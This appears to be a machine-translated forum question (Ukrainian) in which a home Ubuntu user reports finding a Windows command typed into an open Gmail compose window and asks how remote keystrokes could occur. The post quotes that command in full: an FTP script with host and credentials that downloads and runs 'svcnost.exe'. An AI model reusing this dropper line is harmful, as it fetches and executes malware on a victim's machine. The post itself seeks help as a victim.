Мій домашній ПК зазвичай увімкнено, але монітор вимкнено. Цього вечора я повернувся додому з роботи і виявив, що схоже на спробу злому: у моєму браузері мій Gmail був відкритий (це я), але він був у режимі компонування із наступним у TO
полі:
md / c echo відкрити cCTeamFtp.yi.org 21 >> ik & echo користувача ccteam10 765824 >> ik & echo бінарний >> ik & echo отримати svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe та вихід ехо Ви отримали власність
Це виглядає як код командного рядка Windows, і md
початок коду в поєднанні з тим, що Gmail знаходився в режимі композиції, дає зрозуміти, що хтось намагався запустити cmd
команду. Я здогадуюсь, що мені пощастило, що я насправді не запускаю Windows на цьому ПК, але у мене є інші. Це перший раз, коли зі мною трапилось щось подібне. Я не гуру Linux, і в той час я не запускав жодної іншої програми, окрім Firefox.
Я абсолютно впевнений, що я цього не писав, і ніхто інший не був фізично за моїм комп’ютером. Також нещодавно я змінив свій пароль Google (і всі інші мої паролі) на щось подібне, vMA8ogd7bv
тому не думаю, що хтось зламав мій обліковий запис Google.
Що щойно сталося? Як хтось натискає клавіші на моєму комп’ютері, коли це не стара бабуся машина Windows, на якій вже багато років працює зловмисне програмне забезпечення, а нещодавно нова установка Ubuntu?
Оновлення:
Дозвольте мені вирішити деякі моменти та питання:
- Я в Австрії, на селі. Мій маршрутизатор WLAN працює з WPA2 / PSK та середньо-сильним паролем, якого немає у словнику; мав би бути грубої сили і менше ніж 50 метрів звідси; ймовірно, що його зламали.
- Я використовую USB-провідну клавіатуру, тому знову дуже малоймовірно, що хтось міг би бути в зоні дії, щоб зламати її.
- Я не використовував комп’ютер у той час; це було простою вдома, поки я був на роботі. Це нетто-ПК на моніторі, тому я його рідко вимикаю.
- Машині всього два місяці, працює лише Ubuntu, і я не використовую дивне програмне забезпечення або відвідую дивні сайти. Це в основному Stack Exchange, Gmail та газети. Немає ігор. Ubuntu налаштований на постійне оновлення.
- Мені не відомо, що жодна послуга VNC працює; Я, звичайно, не встановив і не ввімкнув його. Я також не запускав жодних інших серверів. Я не впевнений, що за умовчанням вони працюють у Ubuntu?
- Я знаю всі IP-адреси в активності облікового запису Gmail. Я досить впевнений, що Google не був в'їздом.
- Я знайшов програму перегляду файлів журналу , але не знаю, що шукати. Допомога?
Те, що я насправді хочу знати, - і що насправді змушує мене почувати себе небезпечно: як хтось із Інтернету може створювати натискання клавіш на моїй машині? Як я можу запобігти цьому, не маючи про це все цікаво? Я не прихильник Linux, я батько, який спілкувався з Windows 20+ років і мені це набридло. І за всі 18 років роботи в Інтернеті я ніколи особисто не бачив жодної спроби злому, тому це для мене нове.
password
:-)